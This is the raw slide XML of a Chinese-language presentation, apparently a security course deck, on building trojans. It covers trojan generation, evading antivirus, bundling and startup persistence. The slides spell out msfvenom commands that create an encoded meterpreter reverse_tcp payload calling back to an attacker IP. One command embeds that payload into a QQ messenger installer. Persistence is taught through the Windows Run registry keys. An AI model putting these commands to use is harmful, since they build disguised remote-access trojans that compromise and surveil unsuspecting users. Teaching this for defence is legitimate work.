              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=192.168.31.54 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=5555  -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> 5  -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -o /root/shellcode.py</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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5999" y="1592263"/>
            <a:ext cx="4840649" cy="336623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木马免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——shellcode.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析</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4"/>
            <a:ext cx="4868249" cy="3366236"/>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6762821" y="2235200"/>
            <a:ext cx="3894607" cy="2042867"/>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内容解析</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每隔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>5s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>向攻击机进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>连接。</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建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>连接后传输数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>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52001" y="471231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50" y="1592263"/>
            <a:ext cx="4868250" cy="3366236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="right-quote-sign_36811"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5689772" y="471231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木马免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结果检测</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="1592263"/>
            <a:ext cx="12192000" cy="3981223"/>
            <a:chOff x="0" y="1592263"/>
            <a:chExt cx="12192000" cy="3981223"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1592263"/>
              <a:ext cx="1219200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9916"/>
              <a:ext cx="12192000" cy="1938168"/>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木马生成</a:t>
            </a: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木马免杀</a:t>
            </a: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木马捆绑</a:t>
            </a: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木马自启动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3" cstate="print">
            <a:alphaModFix amt="8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28818" y="-6066"/>
            <a:ext cx="1553631" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:sp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2285897"/>
            <a:ext cx="3996532" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C8161E"/>
                </a:solidFill>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>木马捆绑</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1807367" y="3103871"/>
            <a:ext cx="3996533" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>木马程序的特性即是捆绑在正常可执行文件中，接下来进行木马程序的捆绑实验</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351" y="43657"/>
            <a:ext cx="8228447" cy="598488"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马捆绑</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1965410"/>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捆绑命令：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=192.168.47.130 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=5555 -x QQ9.7.6.28997.exe -f exe -o /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>bronya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>文档</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/test_bundle.exe</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351" y="43657"/>
            <a:ext cx="8228447" cy="598488"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马捆绑</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4514"/>
            <a:ext cx="12192000" cy="44752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木马自启动</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="文本占位符 68"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对于一个木马来说，重要的不仅仅是如何进行破坏，还有如何执行。木马只有加载到内存中开始运行，才能够真正体现破坏力，否则，它就只是一个普通的磁盘文件，对于计算机用户的数据、隐私构不成丝毫的威胁。</a:t>
            </a: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04</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自启动技术</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252220" y="2064385"/>
            <a:ext cx="9685020" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>解决永生驻留</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（即实现持久性攻击）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>的第一步便是如何实现伴随系统启动而启动的问题，即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>开机自启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>。这样，即使用户关机重启，木马也随着系统的启动而由系统加载到内存中运行，从而窃取用户数据和隐私。因此，开机自启动技术是病毒木马至关重要的技术，也是杀软重点监测的技术。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>自启动技术主要包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注册表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>启动组 、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Win.ini 、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>System.ini 、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>快速启动目录、</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </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系统服务</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、计划任务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>等等</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注册表技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>简介</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252220" y="2064385"/>
            <a:ext cx="9685020" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>注册表相当于操作系统的数据库，记录着系统中方方面面的数据，其中提供了专门的开机自启动注册表。在每次开机完成后，它都会在这个注册表键下遍历键值，以获取键值中的程序路径，并创建进程启动程序。所以，要想修改注册表实现开机自启动，只需要在这个注册表键下添加我们想要设置自启动程序的路径即可。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>用户默认权限HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>管理员权限HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVesion\Run</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注册表技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重要函数</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075055" y="1880870"/>
            <a:ext cx="10089515" cy="3692525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RegOpenKeyEx函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   打开一个指定的注册表键</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>调用成功返回零（ERROR_SUCCESS）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
